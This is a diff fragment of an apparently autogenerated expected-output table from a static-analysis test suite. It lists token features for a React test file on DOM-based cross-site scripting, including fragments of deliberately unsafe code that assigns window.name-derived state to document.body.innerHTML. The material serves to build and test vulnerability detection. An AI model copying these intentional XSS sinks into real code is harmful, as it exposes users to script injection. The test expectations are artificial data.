autogenerated/Xss/DomBasedXss/react-use-state.js:21:29:21:36 | useState | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:21:29:21:36 | useState | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:21:29:21:43 | exceptional return of useState('foo') | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:21:29:21:43 | exceptional return of useState('foo') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:21:29:21:43 | exceptional return of useState('foo') | enclosingFunctionBody | state setState useState foo setState prev document body innerHTML prev setState window name | +| autogenerated/Xss/DomBasedXss/react-use-state.js:21:29:21:43 | exceptional return of useState('foo') | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:21:29:21:43 | exceptional return of useState('foo') | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:21:29:21:43 | useState('foo') | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:21:29:21:43 | useState('foo') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:21:29:21:43 | useState('foo') | enclosingFunctionBody | state setState useState foo setState prev document body innerHTML prev setState window name | +| autogenerated/Xss/DomBasedXss/react-use-state.js:21:29:21:43 | useState('foo') | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:21:29:21:43 | useState('foo') | fileImports | react | | autogenerated/Xss/DomBasedXss/react-use-state.js:21:38:21:42 | 'foo' | CalleeFlexibleAccessPath | useState | | autogenerated/Xss/DomBasedXss/react-use-state.js:21:38:21:42 | 'foo' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/react-use-state.js:21:38:21:42 | 'foo' | calleeImports | react | @@ -14704,6 +107083,41 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/react-use-state.js:21:38:21:42 | 'foo' | enclosingFunctionBody | state setState useState foo setState prev document body innerHTML prev setState window name | | autogenerated/Xss/DomBasedXss/react-use-state.js:21:38:21:42 | 'foo' | enclosingFunctionName | setStateValueLazy | | autogenerated/Xss/DomBasedXss/react-use-state.js:21:38:21:42 | 'foo' | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:22:5:22:12 | setState | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:22:5:22:12 | setState | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:22:5:22:12 | setState | enclosingFunctionBody | state setState useState foo setState prev document body innerHTML prev setState window name | +| autogenerated/Xss/DomBasedXss/react-use-state.js:22:5:22:12 | setState | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:22:5:22:12 | setState | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:22:5:24:6 | exceptional return of setStat ... \\n }) | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:22:5:24:6 | exceptional return of setStat ... \\n }) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:22:5:24:6 | exceptional return of setStat ... \\n }) | enclosingFunctionBody | state setState useState foo setState prev document body innerHTML prev setState window name | +| autogenerated/Xss/DomBasedXss/react-use-state.js:22:5:24:6 | exceptional return of setStat ... \\n }) | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:22:5:24:6 | exceptional return of setStat ... \\n }) | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:22:5:24:6 | setStat ... \\n }) | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:22:5:24:6 | setStat ... \\n }) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:22:5:24:6 | setStat ... \\n }) | enclosingFunctionBody | state setState useState foo setState prev document body innerHTML prev setState window name | +| autogenerated/Xss/DomBasedXss/react-use-state.js:22:5:24:6 | setStat ... \\n }) | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:22:5:24:6 | setStat ... \\n }) | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:22:14:22:17 | prev | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:22:14:22:17 | prev | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:22:14:22:17 | prev | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:22:14:22:17 | prev | contextSurroundingFunctionParameters | ()\n(prev) | +| autogenerated/Xss/DomBasedXss/react-use-state.js:22:14:22:17 | prev | enclosingFunctionBody | state setState useState foo setState prev document body innerHTML prev setState window name | +| autogenerated/Xss/DomBasedXss/react-use-state.js:22:14:22:17 | prev | enclosingFunctionBody | state setState useState foo setState prev document body innerHTML prev setState window name | +| autogenerated/Xss/DomBasedXss/react-use-state.js:22:14:22:17 | prev | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:22:14:22:17 | prev | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:22:14:22:17 | prev | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:22:14:22:17 | prev | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:22:14:24:5 | 'arguments' object of anonymous function | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:22:14:24:5 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:22:14:24:5 | 'arguments' object of anonymous function | enclosingFunctionBody | state setState useState foo setState prev document body innerHTML prev setState window name | +| autogenerated/Xss/DomBasedXss/react-use-state.js:22:14:24:5 | 'arguments' object of anonymous function | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:22:14:24:5 | 'arguments' object of anonymous function | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:22:14:24:5 | exceptional return of anonymous function | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:22:14:24:5 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:22:14:24:5 | exceptional return of anonymous function | enclosingFunctionBody | state setState useState foo setState prev document body innerHTML prev setState window name | +| autogenerated/Xss/DomBasedXss/react-use-state.js:22:14:24:5 | exceptional return of anonymous function | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:22:14:24:5 | exceptional return of anonymous function | fileImports | react | | autogenerated/Xss/DomBasedXss/react-use-state.js:22:14:24:5 | prev => ... K\\n } | CalleeFlexibleAccessPath | setState | | autogenerated/Xss/DomBasedXss/react-use-state.js:22:14:24:5 | prev => ... K\\n } | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/react-use-state.js:22:14:24:5 | prev => ... K\\n } | calleeImports | react | @@ -14712,12 +107126,67 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/react-use-state.js:22:14:24:5 | prev => ... K\\n } | enclosingFunctionBody | state setState useState foo setState prev document body innerHTML prev setState window name | | autogenerated/Xss/DomBasedXss/react-use-state.js:22:14:24:5 | prev => ... K\\n } | enclosingFunctionName | setStateValueLazy | | autogenerated/Xss/DomBasedXss/react-use-state.js:22:14:24:5 | prev => ... K\\n } | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:22:14:24:5 | return of anonymous function | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:22:14:24:5 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:22:14:24:5 | return of anonymous function | enclosingFunctionBody | state setState useState foo setState prev document body innerHTML prev setState window name | +| autogenerated/Xss/DomBasedXss/react-use-state.js:22:14:24:5 | return of anonymous function | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:22:14:24:5 | return of anonymous function | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:23:9:23:16 | document | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:23:9:23:16 | document | contextSurroundingFunctionParameters | ()\n(prev) | +| autogenerated/Xss/DomBasedXss/react-use-state.js:23:9:23:16 | document | enclosingFunctionBody | state setState useState foo setState prev document body innerHTML prev setState window name | +| autogenerated/Xss/DomBasedXss/react-use-state.js:23:9:23:16 | document | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:23:9:23:16 | document | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:23:9:23:21 | document.body | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:23:9:23:21 | document.body | contextSurroundingFunctionParameters | ()\n(prev) | +| autogenerated/Xss/DomBasedXss/react-use-state.js:23:9:23:21 | document.body | enclosingFunctionBody | state setState useState foo setState prev document body innerHTML prev setState window name | +| autogenerated/Xss/DomBasedXss/react-use-state.js:23:9:23:21 | document.body | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:23:9:23:21 | document.body | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:23:9:23:31 | documen ... nerHTML | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:23:9:23:31 | documen ... nerHTML | contextSurroundingFunctionParameters | ()\n(prev) | +| autogenerated/Xss/DomBasedXss/react-use-state.js:23:9:23:31 | documen ... nerHTML | enclosingFunctionBody | state setState useState foo setState prev document body innerHTML prev setState window name | +| autogenerated/Xss/DomBasedXss/react-use-state.js:23:9:23:31 | documen ... nerHTML | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:23:9:23:31 | documen ... nerHTML | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:23:9:23:38 | documen ... = prev | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:23:9:23:38 | documen ... = prev | contextSurroundingFunctionParameters | ()\n(prev) | +| autogenerated/Xss/DomBasedXss/react-use-state.js:23:9:23:38 | documen ... = prev | enclosingFunctionBody | state setState useState foo setState prev document body innerHTML prev setState window name | +| autogenerated/Xss/DomBasedXss/react-use-state.js:23:9:23:38 | documen ... = prev | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:23:9:23:38 | documen ... = prev | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:23:18:23:21 | body | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:23:18:23:21 | body | contextSurroundingFunctionParameters | ()\n(prev) | +| autogenerated/Xss/DomBasedXss/react-use-state.js:23:18:23:21 | body | enclosingFunctionBody | state setState useState foo setState prev document body innerHTML prev setState window name | +| autogenerated/Xss/DomBasedXss/react-use-state.js:23:18:23:21 | body | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:23:18:23:21 | body | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:23:23:23:31 | innerHTML | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:23:23:23:31 | innerHTML | contextSurroundingFunctionParameters | ()\n(prev) | +| autogenerated/Xss/DomBasedXss/react-use-state.js:23:23:23:31 | innerHTML | enclosingFunctionBody | state setState useState foo setState prev document body innerHTML prev setState window name | +| autogenerated/Xss/DomBasedXss/react-use-state.js:23:23:23:31 | innerHTML | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:23:23:23:31 | innerHTML | fileImports | react | | autogenerated/Xss/DomBasedXss/react-use-state.js:23:35:23:38 | prev | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/react-use-state.js:23:35:23:38 | prev | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | | autogenerated/Xss/DomBasedXss/react-use-state.js:23:35:23:38 | prev | contextSurroundingFunctionParameters | ()\n(prev) | | autogenerated/Xss/DomBasedXss/react-use-state.js:23:35:23:38 | prev | enclosingFunctionBody | state setState useState foo setState prev document body innerHTML prev setState window name | | autogenerated/Xss/DomBasedXss/react-use-state.js:23:35:23:38 | prev | enclosingFunctionName | setStateValueLazy | | autogenerated/Xss/DomBasedXss/react-use-state.js:23:35:23:38 | prev | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:25:5:25:12 | setState | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:25:5:25:12 | setState | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:25:5:25:12 | setState | enclosingFunctionBody | state setState useState foo setState prev document body innerHTML prev setState window name | +| autogenerated/Xss/DomBasedXss/react-use-state.js:25:5:25:12 | setState | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:25:5:25:12 | setState | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:25:5:25:31 | exceptional return of setStat ... w.name) | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:25:5:25:31 | exceptional return of setStat ... w.name) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:25:5:25:31 | exceptional return of setStat ... w.name) | enclosingFunctionBody | state setState useState foo setState prev document body innerHTML prev setState window name | +| autogenerated/Xss/DomBasedXss/react-use-state.js:25:5:25:31 | exceptional return of setStat ... w.name) | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:25:5:25:31 | exceptional return of setStat ... w.name) | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:25:5:25:31 | setStat ... w.name) | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:25:5:25:31 | setStat ... w.name) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:25:5:25:31 | setStat ... w.name) | enclosingFunctionBody | state setState useState foo setState prev document body innerHTML prev setState window name | +| autogenerated/Xss/DomBasedXss/react-use-state.js:25:5:25:31 | setStat ... w.name) | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:25:5:25:31 | setStat ... w.name) | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:25:14:25:30 | 'arguments' object of anonymous function | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:25:14:25:30 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:25:14:25:30 | 'arguments' object of anonymous function | enclosingFunctionBody | state setState useState foo setState prev document body innerHTML prev setState window name | +| autogenerated/Xss/DomBasedXss/react-use-state.js:25:14:25:30 | 'arguments' object of anonymous function | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:25:14:25:30 | 'arguments' object of anonymous function | fileImports | react | | autogenerated/Xss/DomBasedXss/react-use-state.js:25:14:25:30 | () => window.name | CalleeFlexibleAccessPath | setState | | autogenerated/Xss/DomBasedXss/react-use-state.js:25:14:25:30 | () => window.name | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/react-use-state.js:25:14:25:30 | () => window.name | calleeImports | react | @@ -14726,6 +107195,117 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/react-use-state.js:25:14:25:30 | () => window.name | enclosingFunctionBody | state setState useState foo setState prev document body innerHTML prev setState window name | | autogenerated/Xss/DomBasedXss/react-use-state.js:25:14:25:30 | () => window.name | enclosingFunctionName | setStateValueLazy | | autogenerated/Xss/DomBasedXss/react-use-state.js:25:14:25:30 | () => window.name | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:25:14:25:30 | exceptional return of anonymous function | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:25:14:25:30 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:25:14:25:30 | exceptional return of anonymous function | enclosingFunctionBody | state setState useState foo setState prev document body innerHTML prev setState window name | +| autogenerated/Xss/DomBasedXss/react-use-state.js:25:14:25:30 | exceptional return of anonymous function | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:25:14:25:30 | exceptional return of anonymous function | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:25:14:25:30 | return of anonymous function | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:25:14:25:30 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:25:14:25:30 | return of anonymous function | enclosingFunctionBody | state setState useState foo setState prev document body innerHTML prev setState window name | +| autogenerated/Xss/DomBasedXss/react-use-state.js:25:14:25:30 | return of anonymous function | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:25:14:25:30 | return of anonymous function | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:25:20:25:25 | window | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:25:20:25:25 | window | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:25:20:25:25 | window | enclosingFunctionBody | state setState useState foo setState prev document body innerHTML prev setState window name | +| autogenerated/Xss/DomBasedXss/react-use-state.js:25:20:25:25 | window | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:25:20:25:25 | window | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:25:20:25:30 | window.name | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:25:20:25:30 | window.name | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:25:20:25:30 | window.name | enclosingFunctionBody | state setState useState foo setState prev document body innerHTML prev setState window name | +| autogenerated/Xss/DomBasedXss/react-use-state.js:25:20:25:30 | window.name | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:25:20:25:30 | window.name | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:25:27:25:30 | name | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:25:27:25:30 | name | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:25:27:25:30 | name | enclosingFunctionBody | state setState useState foo setState prev document body innerHTML prev setState window name | +| autogenerated/Xss/DomBasedXss/react-use-state.js:25:27:25:30 | name | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:25:27:25:30 | name | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:28:1:28:0 | this | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:28:1:28:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:28:1:28:0 | this | enclosingFunctionBody | state setState useState foo setState safe setState also safe div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:28:1:28:0 | this | enclosingFunctionName | setStateValueSafe | +| autogenerated/Xss/DomBasedXss/react-use-state.js:28:1:28:0 | this | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:28:1:28:0 | useState | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:28:1:28:0 | useState | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:28:1:28:0 | useState | enclosingFunctionBody | state setState useState foo setState safe setState also safe div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:28:1:28:0 | useState | enclosingFunctionName | setStateValueSafe | +| autogenerated/Xss/DomBasedXss/react-use-state.js:28:1:28:0 | useState | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:28:1:33:1 | 'arguments' object of function setStateValueSafe | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:28:1:33:1 | 'arguments' object of function setStateValueSafe | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:28:1:33:1 | 'arguments' object of function setStateValueSafe | enclosingFunctionBody | state setState useState foo setState safe setState also safe div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:28:1:33:1 | 'arguments' object of function setStateValueSafe | enclosingFunctionName | setStateValueSafe | +| autogenerated/Xss/DomBasedXss/react-use-state.js:28:1:33:1 | 'arguments' object of function setStateValueSafe | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:28:1:33:1 | exceptional return of function setStateValueSafe | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:28:1:33:1 | exceptional return of function setStateValueSafe | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:28:1:33:1 | exceptional return of function setStateValueSafe | enclosingFunctionBody | state setState useState foo setState safe setState also safe div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:28:1:33:1 | exceptional return of function setStateValueSafe | enclosingFunctionName | setStateValueSafe | +| autogenerated/Xss/DomBasedXss/react-use-state.js:28:1:33:1 | exceptional return of function setStateValueSafe | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:28:1:33:1 | functio ... // OK\\n} | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:28:1:33:1 | functio ... // OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:28:1:33:1 | functio ... // OK\\n} | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:28:1:33:1 | return of function setStateValueSafe | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:28:1:33:1 | return of function setStateValueSafe | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:28:1:33:1 | return of function setStateValueSafe | enclosingFunctionBody | state setState useState foo setState safe setState also safe div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:28:1:33:1 | return of function setStateValueSafe | enclosingFunctionName | setStateValueSafe | +| autogenerated/Xss/DomBasedXss/react-use-state.js:28:1:33:1 | return of function setStateValueSafe | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:28:10:28:26 | setStateValueSafe | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:28:10:28:26 | setStateValueSafe | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:28:10:28:26 | setStateValueSafe | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:9:29:25 | [state, setState] | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:9:29:25 | [state, setState] | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:9:29:25 | [state, setState] | enclosingFunctionBody | state setState useState foo setState safe setState also safe div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:9:29:25 | [state, setState] | enclosingFunctionName | setStateValueSafe | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:9:29:25 | [state, setState] | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:9:29:43 | [state, ... ('foo') | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:9:29:43 | [state, ... ('foo') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:9:29:43 | [state, ... ('foo') | enclosingFunctionBody | state setState useState foo setState safe setState also safe div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:9:29:43 | [state, ... ('foo') | enclosingFunctionName | setStateValueSafe | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:9:29:43 | [state, ... ('foo') | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:9:29:43 | setState | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:9:29:43 | setState | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:9:29:43 | setState | enclosingFunctionBody | state setState useState foo setState safe setState also safe div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:9:29:43 | setState | enclosingFunctionName | setStateValueSafe | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:9:29:43 | setState | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:9:29:43 | state | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:9:29:43 | state | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:9:29:43 | state | enclosingFunctionBody | state setState useState foo setState safe setState also safe div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:9:29:43 | state | enclosingFunctionName | setStateValueSafe | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:9:29:43 | state | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:10:29:14 | state | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:10:29:14 | state | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:10:29:14 | state | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:10:29:14 | state | contextSurroundingFunctionParameters | () | +| 